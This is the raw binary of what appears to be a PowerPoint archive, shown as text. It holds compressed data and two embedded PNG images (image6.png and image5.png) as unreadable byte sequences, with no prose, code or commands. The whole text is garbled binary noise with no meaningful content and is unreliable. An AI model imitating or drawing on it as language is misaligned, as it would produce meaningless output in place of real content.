.iV.u...y........7....6........\&*-.b.~8?.....L.L(.'.-7....8..RYn.2c..p.4c6    sk....Ir^2.LU\b-S.d..z..jv..K..u:....2...M..,+..R%.%.....`.....LsZ..i.......W:...L..9_..g......EzR...HP>.:.bb....p..p....2..Sci.......6....F....f......3..).%.$+.>...j2.(A..mm_4'..M.KzY@..LB..-..&6.76H.d..M._..M.W.PCX...-..T^....:....=par!x.-..;.au....H.q=
j....k..s.RC.^x..."D.y.....ny....'...LC_.-...-.[....oU.m....@....`..u.-.....n.f........h0    5Dw...Z3..!!.R...K.2.......6......(.I...!.lL.....[V.?.M    .....$4.eo^........p.x.\..ap......<...    ...q...{p2..^_.....r.`$Pg&..:    m3.Z<.x...=..*!Bz.....7...8..}.f9..C.yZg.^.:D.;...V....:..8..{.I..]]....[........iF..tq.r..aV_5(.N..z+..-...B..s...m!..E
.o.g[+..F...{...l...d..........E...@..7...
.."f.+L.G..j..P....J.G....~)....).......ZQ....mSH....A..n...$..A....../..*h<:..3.../...,.x.".&.9.X.@.8..}...H..K.(h..../.S~.M..K....{....h@.>..^....7.. .. .u.L.RE.
.T.9...;y....V*s..).Tp.O[[.=.."...
8.OP.S....B.b........{..i...rp....'J...W\l..y.-Y........-9..Km...rqe[VE..N.....D..+.U]4xBW..;u..t..Gx:..Fpx...V8.e.[d..].4<.o..'...x.......z<.8.....|.F..4...O.H]...a......^......ho.O....$..N.^.wz...zZ.]H...+..f.>Iq}AJ.>......^.x......o...6.D...
........7........E4.Qz..K..\AQ......%M..A../...
D?.of.H.3.ff...(..zX........f.}..e.m...*P.[.........!.eJ.cW5..AG....k.]J.6;.ZL....!..Yb}.....7..8....i......yp.5...}.v.=.k!y.F.j8j.K.V.K..<....I...N...............-<....{;......E...L....;...xB...w.[....Pj...i|.....Oh...+...aw@E...'.5.w.|.Q4r....2.    ....
.(.A..u.....g...qD.".R    ..V...p.wE.Ap..'..||#.@;.S..v.$Tj..k......S.n."Tj.F+....*]..w...R.t....?l.... B.Yg..*u..<.~..?.......PK..
.......!.z..S.K...K......ppt/media/image6.png.PNG
.
...IHDR.....................sRGB........    pHYs..........+....J.IDATx^.}    ..Wu.Z..E...c0....!..Iy\...$L..&.(.\Sas..x#...5.8...%..8,I.\........4c......0..e.......-...n....9:......w.z......|...;....ojzzz....".....M.V......"..(.#...R.....(..A@    k0.RG..E@    K..".....%...J.U...%,...."0......*uT.P...>,......?.8(..G@+...H=T.......t((...`.P..L..QE@.P..1..(..A@    k0.RG..E@    K..".....%...J....W.#..}.....o......$./}..M.6...2....uV7T.a.S....._..=.y.H..zTG`<    .gv ..V9..g.z...v..U.R%=D.c...x...Q...$.....@
.m..0.o..w...F.R.."......1..C....>.#M.L    Q.Wm    .]s.    ......m.....(V.2.2..aTgW..~.........-].$...%.jU..B.*g=..b9%,......=..s.....k_...Z>.BNX...7>..O.._..../..B[.........}...>..'?.I...?..ox...2....Q.8.F....o..e...rp...............W..(j...U_..Q$X...).........\...}._.1..aI.....;.,.LO...p....Wl0..}...1HRG.Fd.'2R......}....)!....W.u.l....m..!. .}.C.....m...o..A.....+.....
..6.V......?x. ,........s..L...4..........].&...@v$s.    '.._...|...V. ..o.....c_..u.7..v.^...)X....H.D.....%m.....W.}...g.....W.@......g4..9..H...#+...?>.F...y..<......g..~..u......i]@    .L
....}.%..........^.:.../9\.p.B......O.A.......W...2.....8h z......4..`.....[o..[......>..j...'....W-.A`.U........W?.3.......w.s    N.9g..q....~....;....% &|.ww.....j..b4_..#8.C............v...W..    0<J...T.*_..L.P..'..';v..V...Kl..]t.4B..oA....U.....4@...SO.TQ=E..    9..Y.N....U...>.r.VT..*..U.....j.F@.n.q?.........[.7m:..7...s?.........`.......H>@..U......../.+...(I
P.K..L.J.b..r..A.v..w...
..?..$........+q.EK.._k.XZ%.....sg..h.fU.>8..6..G....%..).....S#...[...u.<.U....^......0}.V..(Q.5...<,.}.._...h..
.<.....m(O.......B../~.-N.[^....z..D..O..r07.j...)......,{}..k....J-..V..4....+....p..`1...S.8p...h8*...{..mH3.(.*.........6.,.rO`.
+).`.    |.I_&R..D.@.KK+/.,j.......G....JXd........(X.........|.fc.KWXI...O. z..V...O.    .e(    ........UEI.cNu......{..2.Zu..Q.0_C.~..a.f...;.._..$>...*.r;..o.0.....;....z|G........U.......",..A.#|...QP.....L!....`....-..U..w....z.H..o..C.:+.
   WQ.gZ{e .....{.t.M.........ZuT9}..w......g>.+..+xO..P..../.......tBoe......d^..z......o..y..m.{...?~.tOz.....}...;...u.._>....C...oA..-y.B%0..[4 v.f.l.....~..O.Q    .7F.9~!.<..]Q.x...pk..>...ir...~........7X..(.g....{.*.J......D{.JX@..&.V:pS...w.q.. ...#...'/......]..!||..k.G@.W.~..W....;.....1.lY.!..O..OrF.....
J*.........t.;....hx....
..C..v.+..B ._.._.?...w..-oAP...oz...F7p.D.+20..D(.P.N.i..[..h.....Id.4S.......o..........O........G..N..W.........W>....l....J|.._{.........2...7.y....h..}..Do.J.t.f..}5....|.,{$U....T..9%..b../`.@1X...Gj..B=..V..R......V\.....K5=.y%...    ..........$.Z...%.<.B.....V3P.....".    ...%L.i..O...U.N|k...\...$.tJ..x...B;-..    ..R...|.....}.....(....=Xq.U0..AKN.......|....W.>..yzRg...v^.........|......\}..v...c^..W:.5m....L
a...w....G...U..~..K.\pH~.j..i...VkP....&..J0...JX...1.qR... U.."..h..c@.P....VX.I.:..(.JX:...E`0.(a&U.."..(a..P.... ..5.T...."...c@.P......`R..*.......E@....JX.I.:..(.JX:...E`0.(a&U.."..(a..P.... ..5.T...."...c@.P......`R..*.......E@....JX.I.:..(.JX:...E`0.(a&U..".....:.V.0~.Sqi...N;Mhq.3.BX...p..ZLr1...6.......)..v;J.."..$ ......*..@..(au..ZW.........R.^!p.g..W.u...-......"..U=.....v.>...][.....]h..~K....Z.|.5....z.y..m...+...!;SX^:|.......I.....p%\z..X...l..x.    .    .4....Ih..<.....&..!...[a#..{...O..9]..e........<...y.....
..........0.Jv.<.$.3S'.F
..9%....^..,p.e....g.o...s=.t.U.B..]...'....~....}...dx...o......n..x....{.2....../>|...y......{.S.+![....O.]l.F.@.x..."OG;.!...c{..'...r.m.8..97......:.....c.W..[q......+a.p......Z.~.q.S@.0F...4.{.y....I....._.h..[o..Z.....@...N....O9..RK.c..]Q$.#/..8.."a......e.|..K...t....SK......^./"....s#...
#q.5,...'..@7.+P.....e....s.>..^.....:...[..<.....E....k(.r..|..]....$Gh+..E.I...On...8...=f......    (...._...X^..O.......a`e L..FF.    .
..x.7=0p!$..C.l......_....le...B........q.F.....$..._....e.:    .:..I^.h...0"..uF%,aj&N..~n.b~.....=..V..).&Y...V<. Bm.?.x..SaR../.. ..Q8.c.=.\........).Ao../IA..?........h ...XnN..%...M.0.?../....o...7...ah..(|../8.?...W.7.....Pu........{W.B..Na....}?...]4.IZ^}.m..9.S..l.....~.?C...3_>..}..E...h....Y..K/=....-!.h
..Q...[
.?..O]....+....V.7=...Y......Q..T....d.+.....H........LP..i.F|.d..@:...X/.|r...<.Z.....}..u..(!PU..m.V...>.n".)!.........y..s-..@XN.........G..j.bu=.Lm/x."...<8..a..(.~
..M^.#.s...SB..x....~.Q...H..6.)!..}.;... .b.k.k.pO...|.\`.S..!m...j.......\x......P|.SF.:........
/..@...._    ...>.U..d...LA..8Ay.b(.p_..e.n.u..|.g.K.tj.d+ SNX..hwE...z..U}...b._.F..3./)..%...&y.......Q..    ..S..:...YqN    .s7..........3...S......+........|.2D.)d.B.........Q..\.a.;.-IK*..:..HS=TyE`X..Za!4..%,c.&...Q........x....L...y.a{p...A+.A..Za    y.U..uq
c.(1%,%.I..=..N..c...h.,..l.    ........j+...`.....:. ,.II.T.qW..!.G..g..j..7.j@........c'n'.......p*.m...C....V..G...@o...1.I<.JZrlzz....1....mEx.5-....G..h.    .X...../6............5.jvF....bG....yh.V...>g...6..EM....F...,' ...    ..>..W..../.    t..?8J8.....*..0...B[.Y.j.9.-r..Z.{$l.X...9c.5bL
..-...-N@.v%p)ae\.c.%.A...........d...n.6.....<+a..t.Lj.......N.9..S...%..a3....U9(.-d.B.p:...%$.$t...e.... 4.B..JXeg.jy..B........L....Ol[..9...j..haU...Vs.i..}d.&.. ..;......N.....+.f....I.....*aI..,.*....f..=i...|.@j...9H..t,:.t:.-12&q>..L....b../...9,)...V.J..&B.....g...?v...< l/...%.n...9%4..^9..(:! ...N:3e....YI...@....g...=fl...R...W......+_%...W3.."...=.li..TGU>....AwkH.3C.W..b..>W!.1.B.._.tJ8.......C@+.1Ii.
k..*..}LF.,...d8..".....%..$A]P.....JX2..R....$.Q...P.*.O;'=.3,....+...
S/...._...._....x.b.}..Z....X.O...WB..-..`.A....e.....m...1._......._...?.,..T.O:.C..
..Q.lr..    .4oC.r..KX.[*..~..~+..1.......V.M..[........F...o..}....3.):.d..F.r.V.i ..7.J...?}).@!    g........6w.....'P.~x....}{...7z....N>...&Cx.........k.n...t....tB.....}....s8a..    .7..     .....o..$}.3.U..dT...|...u..]..U..<=r....%...M.....KX......2...M...:..@.c.j...I.~...
.....O....5.B..p.Z.?.I.FAs.p%.K(.U...%CD@..........Oc...y..0q...I>.........\#.y..ad......]B..<..a../..    h.....ulj..e.... ....
.mU......*.
T.+Oa....MF...\f....zyY.^>.........O.xG..    .....%.....rR..8..Y...y.w..1_8C%....Z.<.j...^~t..k..v.$j#.!.[...2<.}sv!..a.`..*"`P...h\.......$s.1..-..e..[..5......Lk.1...au.m.v.Zau...V.....P..
y...(.....0..!v.N    ....<Q.h.5Q..`..a#.....'.^Xa......b....T+,!P*..(..#...}...E@.."..%.J...E.{...... <p>.E..w..P.l...Zz$.Z.i'A-.&Zt........!Pq......
....g0.[C....IH.hz.=#A...]2....
K2.TF.P.".T.&.=%,....`...8.F.D...h.....i:.........B.....:.}.
..b>.Q......P..@U...(.!u.1jT...$c..?*.e\ov..h..\a.
^!N7..;...}VH.g.$?..2.Jn...T....(..,T..s:......B.|..D..mB....k..^..+..z.T%q.x..4*"...m......%.0..#:..@5......P........LTq.....]IFg.Q.Z...J....:...g-Ua=.|....a    .O(..c..i.0.p .\..U.$...0.e...|'..[......T?......TEC.b(j%.o5..Z*..]F.1L....R.:.m.....T..<    [!.X.."..1U...*...3l(c>..9.n......f7....S..[..........s..n....'0|........?..q...
.1..E3.T7`....k,.I..J...^..h.\>...%.QCj......',.w...
D.}..g....sCj    ....b.+.............T...D.<.....2J........jq.A..{E....3..    .t....'.../j'D...............U...9T......3...K..0..Y.l....J(_.a.lU."0......h.,$...>..z.....].....uy..b....@E.. ,a.Ab....v.@......*..X......_...=..U.E`.....j.?......<0.r....\3..h    ./F..#/..s=.=4....0../.IL.G^....>....G..ae ..,..IRh....d......)5R..JX%...CA.w.%..9...m.X@..$....-TX...$.M.4..L.>w...5,.*.S*z7.k.r.....h..8..WR.v.Q+.@......3......P+.......y.a    u.Xo.......U.....w6%...b..@..eU0!..O.Uq.\I..5..<R...U.LU5H..N.~..>17..]N.!..i*a..H.@...G@    k.s..!>........I!.....I.k.d8.."w.........R..d...F#..d.IclPZT.v..
.<%...1..........=..l.KB.I..N.Z...K,.T...9.J..
'.'/X..p"..3..|..V.D......W.."Y...`..=d.C#w).t..*..3.k....O..#..C.q~...C.....%..! ..E%..=G..F{..s....".4.K    kXc.Koi...T.K."..x.l7:.-s-.w.Qd...'%...N..o.B.~....IB.!.Xc.....H..K........t.]......
.>..i..+)>}.WXQI...8.....u.Zr..+...PU.a...EI...R".'....`......<.v.......1z.4D..I    ...i.w....N...B]..b.........2.Nn.U_.h...0.V.J.$./.]..?4..a.cC    k....@.LAA...:..JX.2...tN..Tt$......[5.....eZMvW....t...U...h.%.J...E.{....>.-x ..t...r.4...    ..
K...)..@..(au...@.P...(a    .R1E@.......9.|.{g.....>..06....{.-.......1o.    ...Y.+..*.....@*1......9hJX...5..(...(a.c6.=hk:cC....}....e<......x4...^...Q........\..
.c.5u...1t.C.vR.......`..]T..\..%......qa.|..l...5.%u...^.qF.t....!,..RF..>..F...............cEX.y.;...wL.L.....?O..........3.N@g...6)..OU.....^..9..".........w. .L..a5J.i.....=I.(71hI.......$..3..@..'.+t5Cg.J.CX....'.2.pxu%FO..f..8Fn...sFl...S>o...    Mh..D$....c....fH...Ta.[I...($..R.o......ueJ.
.a.Nb..g....^0u..6aAY./..n...b..}...;.<.N.y .g...B....1[.U..e.*.I.7...q.ZK0.`..9.....RvR...q.*y.v....p......;......}.n$....i0:...    ...K..el..p.-gGg.....l.Nw...$W..Kl.=.C.j.....].Os2.%7...
....<vm.Y.....x.p..|@y......7.;..{.5..@.L.!.TmO..|l.JXXt....H/.
.uum.Zw.e.0.LO.e.L.'...M#...h........\....*`.x..SI\.....P?}.#.....DU..vOB.......^.a... T...s...n..A=|..f.....b.w...RH.Z.J..*....@.....kXF#_<....}xGg/.L3V............\.E..BW..T.j..Q.. .*au.aE.v5T.>*...a..6...|..HC.kX..F]U....!..VZF.S.4EU....8.X..(..}XU..T.....>.)a)a.y|V.MJXy.#.........?.V>.{..@n.........!D.......i8..o_.k ..~.......A..?ug....a.....vF........1
H....E.(.*..(.}A@    ./...............I.d...#....c.Xx.....0R;|.c]|..:...i(7....>.h..X...j. +a.Y.".....]...l...O..qR <..cF..H}.h...I.U....<.i.n4b..c.D.2F..j4....D2aMq.L.3(...z.N...g...gcM.DWK....;UU.o..UK.Q.(nQ........$O`)._.^.U.....?._.fO5I&Y....#.u.%.s.g.../.U..jh.....>\.s....D........0,r.*.F....<.$,....8l1...q..D..~|.
....@.`..=.    .2...r(..........W..*...%.../`........N....z....Z.Y...U.*.9..x.S..."
E...iZ8.h.Q.h,Q.;k..i.).\
.F..N.`.l........T.._.zt.L..........[...%n.!.@xw..F...0...8.E..c.......Ds.v..)@..dx.CX.(cifO.
.jwE@..{.: .e.\9t~7.#L.T.*"..a.V.3"Q...-.KV...V.I@ ..g\.Gh.s6.=2.F~.i ...Y..*..P5    I..X.....J*.. .\a.5o..&z<.lD...F..sE.w...U...> .\a..iV......PXaq....e../...........
......zgCWYP..@.....h..l...Q..@.....:.HM+..@O.P..I".....x..Ao.V-.1...pNXtO.^.;A..=.%.6.(.d..i.$8.e.\to..f...1%...........Cs.../DW....9..Y......X....].......jN....F    K...i(#r.rI;...._.I.. o.g0.........o.......l.B......w......faq.1k..%,...29.y......v...)......&,.c? .....v...I.I....0..p_.$...;.&.,.....A{,.. 0..Q...4.....=8../....{.[/x.+.IV.:|.....oy..w..+.VX..................\.tU..r..z....e...l..SE.&G..Y7.a4 ..E.]tO.Z.yz..<~.............?...._;......................y.^...{..y....o..8?....{...}..5k.&..%J...b^^7.%.\.u.MD.:....C.dvPFGy..d ..(|oE..3.....aQ    +a.....|...Mk.u........z.q'oZ..u....7..x..=.v....a.    ...^.'..b.kqq.'_z:h[.fMB.2Q..
.......%sY*e;.tl..l..y....... .3[.#..I&x8JX    .....-...Y\.Z<.
^..S....-,-......U..#.S...uX#.w.G.............K....0....H"c..^x.O%.......p#..mPF....x.IA!8F8.......mZ|.3..C..5.8..$.....Ks.V.<4..9...#.X.....h3.U.u.......B....|A.W....\2.U.K...).u....Ub.)..X...V..b].E......V.....Z..h....a...^....\>.......?.....#K.....e.o Jd(...a...rO.1z...h...NJ.[..vD.........4...!...."...:.2........G~_.,._....o.W@....6S.}.&.4....vc...i.....M..7t.{..'.......( >.y...8....O....t..7.Q.p.OX.{\.+.M..7dx{...|.@..h:+
..U5......~...g...3....B...G..WHbFC.
.80.?...7I.:......
....
.b*.    .o..../{......."D~.w....V...+.W..D.~......S..{....a..j...;........@..N81.Y.....@..V.j....',.[.gP.]8....F..L.......M.........4............Y'33O...6.,.y$.>...#..$....$SEw.S.d.Q.vr..#......*.8.$.$..........`~..V..._./..p.Y............e......\.......xsz.I......gg..K.{.s.....<...g    ..PaE.}....|..Nv.fv...}.....AX.;............,.............a.;A.z..'.............r......%U'wT.......a;#........U...Ol,,.^<..'..UX....TX'.x.2[}?0,..:.m..
....+.C.}.
Vu*,c.*..sd....e._I&.@c+......._Pm...\...k..._.B    .EX....R.3...Wl.}t.W.....U.....".........."a.....FM...%......g.......Ot.)|E.7....H.i-.5R.6@.....!PDX...r...+/.C..... .]K.K...N.}..........N..-.........;x...8i).x...%......5.....z.....<.9?....5....u...;(....{.x....?{`...3.......z...3.%.hkb...PT...~..m........Ewy..+i..ph..?...{.?....~.9'....t...wg>v..g.y.......~:.Jok..........f..6.j..V    +.:QG......].......[.[$..k_z..j...O>..].\T..ek8B-.VO.j..2==...o_8Yy.#..f.<.?B.S..k.._...]..~B.....8...,l...`)..g....np..JX......a.m..G......5UC..ci..o.5....h...........P.)a.#.
.D@    .K.....e0.qA...u*1\v.V..a.IU|.....t.....*...# .Q2..j..ZC8E.PR    ..#K.T..F.....y.N*a5..jV....d.....JX.M.:..4......Q2....v.%.vpV+.@}.R..s..*..N4....lmatH..V.a............n.........J.X......8=tZ.)ak.J)..@.......jQ.....P.j.d5..(.u..;....s-z.{....    .P...5l1    aE.'.6...^.......JX.C.....A    ..LIrD.....&K.+...".G@......".....%..$B.P...8.JXq.T...l.r......}h..?!J.|..P....b.#.g...{......KT....WG....JX:...E`0.(a&Um:J...;...].^033.....s|.N.%.~..S/....n8.....'|.gtDm$.....h.......0?l.>p.l..lht.........H.(i3.>[X.PE...O.9...a...9]T.(........0.z.........]./.l.UW.
^..p.-.....$<;...+.@..7..{....v..O.#j...[ny...z...~.M.......7.1..;.$J..g....A.6..[.+..n.}.-:m..).nt.ES3.1....;..h..!..smN............3.x.............).3.|.......O...O|.E..{.Y    ..:.68n.u4 .......^..g..A....~.ad.......!..2..:.lx.G.6.....~...    %.h.T.D..m...3(z.....}.._..*)..e .d.....m..g.<.F.D..&...%J.._.q5.E2..8`w....:F..Q.$L.....t..[G...M.r"r.).@.u..sP........V@v>..........(:.h....et....%...J....Q...%.T.&K~...q!..j..9...{...B;,.;......N...........{......?..b..-BE=..pn........$.2Hd......M..C...m....>.../...[n......2`.i..'..n..wun..x../...ex..J@...... |.u.w.q......%t....C...H..E!~'.)..\.[...4..L....M.....h........;_N.l1..a".H....[....o...TU.\]!.J.#.....$T.(.=B....&t......S...........).Y._.j+.m"...p"...n..~...I.tJ....(m...bP.j)..3..u.a..+a.!.....C....V..5.V`V#.."P....j..{..
kb.,.<.33+O5u.I...
..    R...E...JX:...E`0.L
a...^.a0.B.U....D.V9..k...(.K.D.\..Sa..t.........
.....rC..>..?U...T...#.C....?...?.5"E@..@...2~B...x...b..ii..8....+&).U[..S.m4......=9.G.O!d..b../.....5T....C...6...hQC...N...+...*"P.>....V~B....D"....`.T[.'>.......    ......J...?Y...S.|.&.....&......s..<...O.x7*.AC.....gl.I,....e.U..aE!B.6*..+F.....`D.8.9M..rj.....n'....o.6..........K`S.....'aG....S...4BX....B.&.......-R....[.G...G.;.(......=.....L..k.    4..au.#RU^.&.<O?...#...$...    ..@;>..`]./=&.f    K~;.D2,c.......p. Z.*....~c0........PUk...........D5@....L.R...v.....N....eO...ot....;.&{.....B..d....}..;..Mj+k............q..Wxp'-.s......XJO...>......!Oo.%r...s%...+i./t.].v#.%.=!by.....i*a...(a..CL(a    s...P..x.e,..e...W..(....Hw.BU.|.1.......y=D'H....%.'.F..S..I.z...a.0).]..a.7...@`..D+.....T...f.H...~..T.N:.$....zu....U..FXa....#..|...Za..].(...". .:%l.\U..(.u.P....jS.:F..'7../.g0......z^C..[.4d.V.....j.U.&....n.|..k.1..{.4.zs.....Zt.._.....~8.c..6.c..v6B.s...s[.i..p.....h..8........N............|k....!>..+,....C....}..H...-.Q.urf$o./.+Q.d..7zE.Qg.,I...+..4>...l....8}.....i6..c........h.,....... c(.].+al....]Z9.......'...).%..>..R..k4....I....S_j.l..2.....tn.'o..w.8C.8\+......}w......[.k.~x.    .    .Ifvv..W.0..x.    .wO..m....s.o}k5.p%..a.......P.6\.}Mh.8|R.,%,cJ%../<...HJ.$.p.I..
..P.h..u=...so?.T.....a./.r.`...\or..7.>'."q....%...(....%...=x.    .I..g>..W^.8o<......l.........o..1(...Yk+....R..a    ..di<W.OX45..).R,OI....6...9.U.o.dc.u...z..O.$`....>...f..)..q.......y...a...&............_..p.(....8g4.a    o.',...v.tz..J&tc..s.....).i.R.S..1..f..F..r.3Ps.|...c;v..T....
......L.S    ..I8..?............Sh.Vr.G.............d...$i")...+....*....ya6.?R    ...Y.g..*...N..t...p%v.......{..b;w..3r..9..u..Q..UXy..h0*..h.d..zt...d..#*.[.....0..
..o    ?...C..m..x.    .    z..[....W_.b`7\..^.]7....{.a.-B...gp%[......K.9ny.....?....ST=Q.E-v..j......p    ....:..D..+.....-.)p..1.2J....c.r.gW.rx......~.e .    {...xb;....a......&.U..@.d.'a.?....R['b.uw.3..%.1.....0d.}.KX1}.~e.&................E`..(..[    k.........JXc.LE..w.......q.O..>..hlc..VXc.FB.....*.s...wO.=...Y.....F....I.........d.    .p..
K.tO.-....%..C...U.a..*.:U..(.."...,..].P.*"..U.LU..(.."...,...+.
.4...$...-..B8...=4..j..K..375../..j4....B.73..m..?3..r9...y.8..WD'..`..4..-...yQ.Q.....n_9[1....$..t.n..{_h...^...]x\.....W..@W.$....%.....!3.....%.#|.o....3..E...6.A.i.q.?......
@J..Q)..-Q................8?..^>6t..:/..>....(.<...>s.]{.$.V.1Dy'.h.zr.....k..|>..-}.~6$.-9..c.vI/'[...9U...?..~:..k.1P%..de...M~.(....#!.[>a.m.sLX..}...7..c...>X........C$..".%.l....n..H.z.....`..4..G)    ....j......Z..r..:.$..!..    ..V..aa..%..c.u.....N..@..p
nC.E........}.C.b..3.*_c.Ju..H...e..... ..*.WI..K3.....#le..pV.3.?....e.~.%..Q+........)!"@/^...[.+/..Y.....6......CXt!......\.U%.LB.....J.     .......a....d..L..$C.0.{V....#*........%.o..ZR.*Q.-Jl9e.    ..P]..FK.A./....^..n=p...V....x.....X.......<.<7*.r.
.....'...H.E....e_>.(..Zv...d..u..n.% .7........Uts.|.i..z8=.........Q.......O.h..t.Lp....o.SH....'..../.'.....'6....v.. .......4...LXQ.T@..(..y.@C......&..H).4a...K.i.t....1.....p.?...=...G.....G@...B.......z. uO.P.. .Pae.t^c_..m.'.a.$..>..V...c...&....pLh.%.J...E.{......z..(.B....@.."..t...V.9P.$.4....z?e....}.9.E./Q..._.K.r.y...i._....1.........>D.......&..<...&`|.3.FK....Va+..N...[.V..~.n....... .LX%.].....'...E    ..7.i..Z..[......J...8.,...6..-.f.....oq.Kb....*........J...$w..n.O..{%.V.0...*.K...9/fK<O.Ku4.-....F..$7..%o.c.....3..%1.B&)5.p.s..#G4C....%^...P5.1..e.+.../...S...=..H.7=..#....i.....9....o.k........B.....!u.E.F]
..+.',.Z..L.....%(.H3.#u.Tq.i%..'j...NF|.Q+..d ..........&.+.'..........    ...N..'....
...DR......*..s......[..8...(.|r..r.a.5.c...Rcvz..$U...IW8..-............>.XY..I].....U..<l..l.....xa.....
c..5`..............H.]    .%.......1g/y#y(...r........L....d.p.2./q....H`...s.d....}4    .D....Bz.]0..r=....<..z.
.l....~.;..3..    ....1.g.._G>`.1.J2..K..........3.<......4.P.@2aE.R.E.'.d.;z...a#....bl.h.6.P.&0%...B.i.......Q.u.H.q..A......G.pMm*.    .h.....*..@..$TX..E..6....{.w{    U..{..a.
K...)..@..(au...@.P...(a    .R1E@....%..s..H.h.IC..~....X..>.
...+...?.'...Sw......I.......MEf...g...].n..b.......>..1n...#.x.....h..y..^...v...."0,...K.I....\...P..b...+.fH.;.#coka..v.)...Y...y.......N..f.<.Z..gA.A.3beD.......J
.&.x..    ......}.<.V.'....#O.(...;...r....9+\y#..N..........<
.c........&..:.le..OX>.M.i..........&.    ...C..<#rI.t ..N.[r...B.........$.T.....d.a...}.Qq........$..,l./$P..w..5J.................\DX..L.C4.')BXa6.."t&C,..3l....0.C.9.t.
4..y..iu....).O.3;.v%.%.........L...@.......rg..N.h/    ..Q"..Q...U *.\.C>a..2.c...&.l.Xv... ..I....G.../.).[8n...@ m.^.FCO.I......Yb.5..L...Cj....].].a.7;}.....&Y.1.....g7.U...z..|bR..$M\....'.M..O't.G.._...4D}Q7....r.>*.8.....]#.@..........Q.T..G...h.Q..E%....DG.7u.h...<|.)a.;E.]....{.......O...i0.o..6......=.;.^.VF@+....:E@.h...
K.t........    +...767.Ts....]8<.....b..".=.JX..@=P...!.JXB.TL.P..G@    .......!.')+LDa.N@.$,#Tz>H.C...v_.i.....q.2.'.."P.H....4.lP...a\..!,.".....p]...D....U.#(....E......<..U.R.r....M..u
...=l.(?........AJ4H..E].7.dX.Q.%.QN:KN.3\..~.b.G.....wv/....v..._...b......$9..s]r.
.....K:.O...IsX.\m...(..C....qv.}.b...    .....k..L%.."..........(8I.9.I5.JeJp....Y....%Z..z..o.:".....i....yj.F%a.M.<...,W....'e..a.>..    ...-.D..T...{*    .?.R-J.;..9......G.F...p.$..lr...V6...^]...E..y..~$.Q..u..'\u.;...E.9r.W`..R..Yg..SI6...    ..7y.'..).t'}..i..&*P.c.~.p..Bo...5@lC>..=...?i..Ir9.}.R....9.#.0S.b..^4..@..E..v.P-.vF..f.0.J....{X.O.}...KB.F.O.3/#.H...e.tJHe.Eh....HJ..M..Y.g........f..F*t,,...<7.m..a......P....!...y..U`lA    A...y..pnn.9...sf.;.Sa..    5..(........
E@....JX.I.:..(.    ;.*X.E@...p.T.'....&$..."0..h.5.Y.. ..tO.(.    ...B`.....b..".=.JX..@=P...!.JXB.TL.P..G@    ...L...=.6....X..    T..)a5....*...f.....>...`..z..uI.P...(a..p .7).....H1.QC...~.F...l..V".O0
.....
.......P,.7!.I8.t..8%.....q.......ia.....$I.P.%..x.8E....gl..9P-....$T..Qv.......S    ...60s..>.0.."..%M.....+OU.h..[..B=vw_,.#D    .|.L...D.."{...N..i...$....a.y.
3..<.a%.n..`....;m...S.h..3.|.*O..z".?.hC...:.w..P...S    +..D.....p..>R....4........S.F.\.}`.h3..Uy8.{9..P..VI.../.....N.x....c.$.E.S....u.y..E2QO..-.......p5..p~.:    1..JX-.....j...A..Y(lK...'..|Ld..C.....]2.@a..NI..e..F..I../.Z.F#..0....V.a.P.... ....L....".E@    +
.
(..@_...c......A....IEND.B`.PK..
.......!.-..hT...T.......ppt/media/image5.png.PNG
.
...IHDR.....................sRGB........    pHYs..........+......IDATx^...x#.u.....    . A..N......jUV]...8......q.8.7q.7v.._l.y...c'q.{.U..U......w.$...gx..,X..d..y.y.....3s1..s.=.{t=m.....6..235...........C...>O...."...1..=.....3.W.....KK.....a=.)........p...a..l..B]..Ph>.a4.tl....mC33.Su&....%.*...3......s.....r..<..awd.!.......C..>..7.....c...n2[....9u....J*{;[v.{...y>..l.vg.........
.:ZR.t.G.-#"...o..D....n..k..s... g.s...s..U.n...gC..}.}.    .........e.....9....r.i..y{.r.........}4..nM.'%..q......su%&..iE..4.......|._.... ..hT.z.'n..
..7..W..B..Hm.E..G.;..F&g..s........}.~')I.r.%gF.....X*Z]>...{.....+x.O.,..\.`....zf....d.3.....twd.....t..:mMN.X.....k.ri..k0.....RW....G..?.../....-...=e....w...=ZVS{....6gN.................kJ.....!..P....d6......W.......x/......W.........
F.....=..v...##....<i....G.........7.....^..A?f6....k@R.....g<.<>.w........L../.3JK .V.....`>.cH....uU.P~.....x.d....I..aB.k|=w2#=..3.....1.h.z....>....2..
3.jm..3.......".M.'.VT:.Z.g...7...#C..U.m..1k.,....XJ..S..g+...S.A.5.<.Fu.w$..;...tahnj.m.M.....,J(#...`.`.7Y..:cQj.......... ...\gM..."..s.x.f1.L.f.N.;U.j.....n...r.-
..E..=.../..vm..>.ykS../.......%e7..6..X..v..V.9].h..b..ed..]<.(................Y....^R..C.%......e.....J*.K.S..G......?.......O8..u.$..`,O.e r-...qr...nmmJ9},...ZY=......;...&M.f.k...T%.Wv\z....&+?....t.\f.m&..o*..j....{[.........m...F..I.....*..~1.g0..a...../.O..(...m...O.s..W*V...1....^.y...:G..%.....O$...~r..CgO.g..4.L...Q%..G].gnvrvar.P....'.!..WhUgO.......7.]"..=ss.y.....R[.zh 4....fE...l\Ko0...i%,.=....4(.J.S..    ..g.[..t.    .S..`....mh.c.}c..i.V......%..}....b....8.....7.x#..qD....G6>.......g>..*.T.5..pI.*T.)_CA..D.c.......r(n3.S|.GC.......L.'v..|...Rg......:.~....._.\n2...B1..o)...s!E.
x...........h..Rm.sLM..u...5.p....;o.@Rv......Wn{...~.sm........_U?]>..5.#.:..
.es.S...+......BWv.a.......A....X.p*5.n.n.|S...XRyHg<p.77=.{..&PH..JV4......V..../={..3..wvvz<..#..p..V..^w.....M.`9s.}..C.|....Y.-EI.... ......-i...G......V.633.e....O..O.....2.4.SI..9...p....?..?..T..tm.
X.Y.KKi....>x........>.....=;~9o.Z.J..o..b@~    .k.....Fga.2..j.....Y2?.T(>..C)..y.w..i.8i#..d..N.............v...!.[.nT.H..33...6k.......?.......F..@.8...    ....p.Bqq....&.......#.....>............]..S.e..s.................\.C..N=....1bj...D>KKK...,..F.,.Ev.......%.....`    L.q.}...+..Xo._..e{.....s.........1'........U....k.......|z.....pF..dK...G_..>.@t.....(*....>.G..qKLu-N-..[.|.....^......._..Z.....]..........H.Z..t@.z.S(Z.....h8*.%.........R..[.,>...~..}...
......g?....\+........./U.....9.....@.Q.    ..    F...."D\u.....g...~...}...h.>2.Q3..TOoxH...{.._.|.o............R...3.}.Wi@cs$.....
...a!L.S.S`.
.u.U.....@
